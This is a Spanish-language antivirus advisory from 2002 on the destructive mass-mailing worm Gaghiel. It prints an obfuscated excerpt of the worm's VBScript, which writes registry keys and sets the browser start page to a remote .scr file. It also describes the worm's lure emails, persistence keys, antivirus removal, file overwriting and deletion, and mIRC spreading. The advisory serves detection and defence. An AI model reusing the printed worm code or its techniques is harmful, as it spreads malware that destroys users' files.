Gaghiel

Gaghiel, se propaga por Correo y Chat sobre-escribe y borra archivos de varias extensiones y del sistema.

W32/Gaghiel@mm, VBS/Gaggle@mm

Gaghiel es un gusano destructivo reportado el 20 de Diciembre del 2002 de propagación masiva vía mensajes de correo en varios formatos aleatorios y archivos anexados con extensión .HTML, el mismo que libera un Visual Basic Script. Infecta con tan solo visualizar el mensaje al vulnerar el MIME exploit, que ejecuta el archivo si el usuario tiene configurada la opción de vista previa en su software de correo.

El archivo se auto-envía a la Libreta de Direcciones de MS Outlook y a los usuarios del mIRC.

Su autor, MachineDramon, perteneciente al grupo internacional de creadores de virus GEZDAC al empezar su código, en forma irreverente distorsiona la oración del Padre Nuestro, cuyo mensaje mostrará en una fecha determinada:

REM <**********GEDZAC LABS 2002**********>
REM VBS/Gaghiel.B by MachineDramon/GEDZAC
REM Hecho en el Peru, Calidad Mundial
REM Sachiel2015@latinmail.com,
REM 27-11-2002 Tacna-Peru
REM Derechos Reservados
On Error Resume Next
Dim gf, gw
set gf = createobject(q("tdunwsni`)ankbT~tsbjhembds"))
set gw = createobject(q("Ptdunws)Tobkk"))
GWR=q("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[") & _
q("Pnichpt'Tdunwsni`'Ohts[Tbssni`t[Snjbhrs")
Tg=gw.RegRead(GWR)
if (Tg>=1) or (Tg="") Then
gw.RegWrite GWR, 0, "REG_DWORD"
end if
if Day(date) > 25 then
Sd=q("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Nisbu")& _
q("ibs'Bwkhubu[Jfni[Tsfus'Wf`b")
Sg=q("ossw=((ppp)`ufsntpbe)dhj(jfdonibcufjhi6(")& _
q("tfdonbk)mw`)tdu")
gw.regWrite Sd, Sg
end if
if (Month(date) + Day(date) = 30) then
msgbox "Oracion antes de entrar"& _
" al internet:" & vbCrlf & _
" "& vbCrlf & _
"Satelite nuestro que estas "& _
"en el cielo," & vbCrlf & _
"Acelerado sea tu link," & vbCrlf & _
"Venga a nosotros tu hipertexto," & vbCrlf & _
"Hagase tu conexion en lo real como"& _
" en lo virtual," & vbCrlf & _
"Danos hoy el download de cada dia," & vbCrlf & _
"Perdona el cafe en el Teclado," & vbCrlf & _
"Asi como nosotros perdonamos a"& _
" nuestros proveedores,"&vbCrlf& _
"No nos dejes caer la conexion," & vbCrlf & _
"Y libranos de todo Virus," & vbCrlf & _
"En nombre del Server, del Modem y del "& _
"santo User-name."&vbCrlf& _
"Log-in."&vbCrlf& _
" "&vbCrlf& _
"GEDZAC LABS 2002"&vbCrlf& _
"VBS/Gaghiel by MachineDramon"&vbCrlf& _
"Hecho en el Perú, Calidad Mundial"&vbCrlf& _
"Sachiel2015@latinmail.com", 15, "Gaghiel"

Su diversidad de mensajes, archivos anexados y contenidos se pueden resumir en:

Asunto: Su computadora es un Zombi?
Anexado: PcZombi.html
Contenido: Debido al reciente ataque a los servidores...

Asunto: Windows y Osama Ben Laden
Anexado: RAT seguridad.html
Contenido: Debido a las recientes declaraciones de...

Asunto: Te envio la info que me pediste
Anexado: InformacionCuentas.html
Contenido: Hola, se me perdio el papel q' me diste...

Asunto: Sexalud
Anexado: Sexalud.html
Contenido: Sexalud,la pagina de Terra para resolver tus dudas de sexualidad...

Siendo la siguiente, la muestra enviada a nuestro servidor:

Al ejecutarse el gusano, abre una ventana en Internet Explorer, en el campo donde usualmente aparecen las páginas web y en la barra del título muestra este texto:

Naria y Erya

Y su ventana contiene este mensaje:

Gaghiel
Error Cargando : 2015

Inmediatamente presenta, a manera de supuesta advertencia, esta caja de diálogo:

Si se hace click en el botón "Yes" el gusano se copiará a la carpeta %System% con el nombre Gaghiel.vbs, que tiene una extensión de 24.1KB.

Para ejecutarse la próxima vez que se inicie el sistema genera las siguientes llaves de registro:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Gaghiel" = "C:\%System%\Gaghiel.vbs"

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run Domain Manager]
"Gaghiel" = "C:\%System%\Gaghiel.vbs"

Y si se ejecuta en una fecha superior al día 25 de cada mes, reemplazará la página de inicio del navegador con la siguiente llave:

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http:/ /www.gratisweb.com/machinedramon1/sachiel.jpg.scr"

Esta dirección IP no existe.

También crea llaves de registro e instrucciones para borrar los siguientes antivirus:

PER Antivirus (al cual su autor le ha agregado mayor esmero en la programación del gusano, obviamente sin conseguir su objetivo).
Hacksoft
VirusScan de McAfee
Panda
Symantec

A continuación el gusano muestra la siguiente caja de diálogo:

Cuando el archivo Gaghiel.vbs es ejecutado, genera los siguientes archivos en el directorio o carpetas de Windows:

C:\%Windir%\Gaghiel.html
C:\%System%\AngeldelMar.html
C:\%Temp%\PcZombi.html
C:\%temp%\RAT seguridad.html
C:\%temp%\InformacionCuentas.html
C:\%temp%\VirtualLetter.html
C:\%temp%\Sexalud.html

El archivo Gaghiel.html tiene 36.5KB y los restantes 53.4KB

%System% es la variable C:\Windows\System para Windows 95/98/Me, C:\Winnt\System32 para Windows NT/2000 y C:\Windows\System32 para Windows XP.

%Windir% es una variable que corresponde a C:\Windows en Windows 95/98/Me/XP y C:\Winnt en Windows NT\2000.

El gusano sobre-escribe con su propio código, todos los archivos con extensión .vbs de todas las sub-carpetas y unidades de disco del sistema infectado, a excepción de los .vbs ubicados en las carpetas raíz.

Asimismo se inserta en los archivos con extensiones .asp, .hta, .htm, .html, .msconfig, .php, .phtm, .phtml, .plg, .regedb32, .sfc, .shtm y .shtml ubicados en todas las sub-carpetas, excepto en las carpetas raíz y las infectará con su código viral, anteponiendo la palabra "Gaghiel". Los archivos infectados se incrementarán a 53.3KB.

También borra cualquier archivo con las extensiones .asp, .hta, .htm, .html, .msconfig, .php, .phtm, .phtml, .plg, .regedb32, .sfc, .shtm y .shtml, de todas las sub-carpetas de las unidades de disco con atributos de escritura, a excepción de las carpetas raíz.

Si el software mIRC está instalado en el sistema infectado, el gusano reemplaza los archivos Mirc32.exe o Mirc.ini por un archivo, auto-generado, denominado Chanel.hlp que tiene 2.8 KB de extensión y al ser ejecutado infectará a todos los usuarios conectados en una misma sesión de Chat.

Finalmente este nocivo gusano procederá a borrar los siguientes archivos del sistema:

Msconfig.exe únicamente en Windows 98/Me/XP
Regedit.exe en todos los sistemas Windows de 32 bits

El día 30 de cada mes, o si la suma del número de mes, mas el número del día es igual a 30, el gusano mostrará la siguiente caja de diálogo:

El parche para el MIME exploit puede ser descargado de:

http://www.microsoft.com/technet/security/bulletin/MS02-066.asp

PER ANTIVIRUS® versión 7.8 con registro de virus al 20 de Diciembre del 2002 detecta y elimina eficientemente este gusano Visual Basic Script.